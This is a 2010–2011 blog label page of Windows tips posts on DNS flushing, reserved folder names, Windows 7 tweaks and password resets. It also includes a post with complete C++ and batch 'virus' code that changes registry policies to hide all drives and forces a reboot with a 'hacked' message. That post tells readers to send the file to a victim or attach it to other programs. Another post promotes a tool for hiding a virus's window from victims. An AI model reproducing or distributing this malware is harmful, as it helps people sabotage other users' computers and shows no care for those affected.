Showing posts with label Windows 7. Show all posts
Showing posts with label Windows 7. Show all posts

Monday, July 25, 2011

How to Break Windows 7 Password?


To avoid possible unfortunate incident that the users forgot their Windows login password, there are a lot of solutions to break Windows 7 password in the market. Here I would like to share two with you.

Method 1: Password Reset Disk

Windows 7 has its own a backup method called a password reset disk.
How to create a password reset disk?

Continue   Reading>>

Friday, July 15, 2011

How to Clear/Flush DNS cache in Linux/Windows/Mac Os?


If a website newly registered in internet world, it may not be loaded in your computer.  For example, you register for example.com yesterday, still you may not see your web page. This is problem of DNS cache.  Your local DNS cache is old one so it won't know the newely available domain names.  Sometime you may update the NS records of your domain to point to new hosting service.

In these case you have to clear or flush cache in your computer.

Continue   Reading>>

Tuesday, April 19, 2011

why can not we create con folder in windows?


A Reason Behind the Con Folder Creation in Windows

We all know that we can't create Con, Folder in windows. not only con but also " PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, LPT9 and more".

Here i am going to explain why you can not create the con folder in windows.

Reason:

We can not create folder with con,aux, nul because these are reserved keywords used by DOS. so if u r allowed to create such folders, there will be an ambiguity in where to write data when the data is supposed to go to the specified devices. In other words, if i want to print something, internally what windows does is -- it will write the data to the folder prn (virtually u can call it a folder, i mean prn, con, etc are virtual folders in device level). So if we are able to create con folder, windows will get confused where to write the data, to virtual con folder or real one.

Keywords and Their corresponding Functions:
Reserved KeywordsFunction
CONKeyboard and Display
PRNSystem list device, usually a parellel port
AUXAuxiliary Device,usually a serial port
NULBit-Bucket Device
A:-Z:Drive Letter
COM1First Serial communications port
COM2Second Serial communications port
COM3Third Serial communications port
COM4Fourth Serial communications port
LPT1First Parallel printer port
LPT2second Parallel printer port
LPT3Third Parallel printer port


But we can create con folder using this Trick:
How to Create Con Folder using Command Prompt?



Continue   Reading>>

How to Create Con Folder in windows using Cmd?|Computer Tricks


we all know that can't create con folder in windows.  Read this article to know why is it not possible to create con folder?

Here is simple trick to create con folder in windows using Command Prompt.

Step 1:
Open Command Prompt(Start->run->cmd)
Step 2:
Continue   Reading>>

Saturday, March 12, 2011

How to block or Disable Autorun.inf file in windows xp,Windows 7-Registry Edit



Block Autorun

Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Autorun functionality:
To disable the Autorun functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.

Continue   Reading>>

Saturday, February 12, 2011

Open Microsoft 2007 file in Microsoft 2003 -Computer Tricks


It may big issue to open the Microsoft 2007 files in microsoft 2003. But it is easy to open the file in Ms 2003. You have to download the MS2007 compatibility pack for Ms2003.

Download it from here:
http://www.microsoft.com/downloads/details.aspx?FamilyId=941b3470-3ae9-4aee-8f43-c6bb74cd1466&displaylang=en

Enjoy...!!!

Suggestion:
Better start to use Ms 2007.
Old is gold but New is Diamond..!!!
Continue   Reading>>

Wednesday, February 2, 2011

How to hide the windows while running the virus code?


Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.

Continue   Reading>>

Friday, January 28, 2011

C++ ,Batch Virus code to disable All Hard disk



Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim


Continue   Reading>>

Monday, December 27, 2010

Wonderful Notepad for programmers-Notepad++


Hi friends, I like to do programming,hacking,blogging. I am addicted to these three things. Especially for programming. As a programmer i have used more tools . So i like to introduce my favorite notepad namely Notepad++ . It supports all programming language.

Features:
  • Clear View of coding So easy to debug the code
  • Different Colors for Keywords ,variables
  • Easy to edit
Continue   Reading>>

Windows 7 Tips -Know what is basic


Now Windows 7 become very famous operating system. Because of its look,features and more. Some users may not know some windows 7 tricks. For those peoples this article will help to know the basic features of Windows 7 and how to use it.

Using keyboard shortcuts
Continue   Reading>>

Sunday, December 26, 2010

How to find hiddel files or folders using cmd?


Hi friends this is simple trick to find the hidden folders or files

Steps:

Go to start->run
Type as cmd and hit enter
Continue   Reading>>

Saturday, December 25, 2010

Tricks to install from Pen drive (windows xp,7,vista)


you don't have cd drive? In this situation how can you install the windows xp or 7 or vista. ? I am going to guide you to install the Windows.

Requirements:
Windows Dvd or it’s ISO image
Optical drive emulation software( like demon tools)
Wintoflash software
USB drive (minimum 4 gb)
Continue   Reading>>

Tuesday, December 21, 2010

How to load the thumbnail of taskbar programs faster in windows 7?


Windows 7 users know that thumbnail preview of taskbar items is a very cool feature. You can view the thumbnail by hovering the mouse over the respective taskbar item. However, you may notice that sometimes, the previews do not appear quickly. Here is a hack to fix the taskbar preview delay time.

Continue   Reading>>

How to enable alert User interface in windows 7?


Aero is a very cool and beautiful user interface of Windows 7. To run Aero, you need a PC with specs like 1 GHz CPU, 1 GB system memory and 128MB of video RAM. If your system is low on specs, you won’t be able to use Aero. Here is a workaround for enabling Aero on systems that have low specs.

Continue   Reading>>

Monday, December 20, 2010

How to enable Quick launch in Windows 7?




1. Right click on the taskbar and then select New Toolbar.

2. You need to put the following location %userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch in the new window that appears.

3. Next, click on ‘Select Folder’.

4. Quick Launch will appear on the taskbar but will contain text of the respective icon. To hide it, click on the dotted lines and uncheck ‘Show Title’ and ‘Show Text’
Continue   Reading>>

How to change the login page in windows 7?



1. Launch the Windows Registry Editor by typing Regedit in Start Menu

2. Go to ‘HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background‘.

3. Double-click the DWORD value called ‘OEM Background’ to open it and enter 1 in the Value data field.

Note: If the DWORD ‘OEM Background’ is not there, you need to make it.

4. Browse to the background image that you would like use on the log-in screen. A JPEG file that is less than 245 kb in size can only be used here.

5. Copy the image you want to use into the ‘%windir%\system32\oobe\info\backgrounds‘ folder. If the folder is not present, you need to create it.

6. Rename the image to backgroundDefault.jpg

7. Restart your computer to check the new login background screen.
Continue   Reading>>

Saturday, December 18, 2010

How to Access Hidden Themes in Windows 7?


Windows 7 offers a good assortment of themes to customize the feel as well as the look of your computer. Windows 7 features particular themes which are based on the location and the language you select while you install the Windows 7.

You can look for the location-specific theme in the Personalize menu. You just have to right-click at any place upon your computer desktop. You will be able to get the couple of themes according to your location.
Continue   Reading>>

Friday, December 17, 2010

Small fun with Notepad |caps Lock Trick


What fun are we going to make with notepad?  
     Below you can find the Visual Basic Script code.  This code make the caps lock light blink continuously.  If you run this script twice the rate of blink increases and alternatively NumLock light start to blink with CapsLock.
Continue   Reading>>

Thursday, December 16, 2010

How to clean the Process in RAM using Notepad?


All of us know about RAM is important for system.  RAM is known as Random Access Memory(temporary memory for system).  RAM stores data or process which are running currently now.  But the stored data will be alive until the system is turned on.  Once you turned off the system data will be erased from system.

Continue   Reading>>

Wednesday, December 8, 2010

How to lock a folder without any software (Batch Programming)


Hi in my last post i guide you to create a batch programming to create a locker. This is very cool. You don't need to download any locker softwares. You are going to enjoy this hack.

In my older post i explain you how to lock folder using command prompt. But in that no password option. But this is going to very cool using password.
Continue   Reading>>
Older Post Home
 

Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com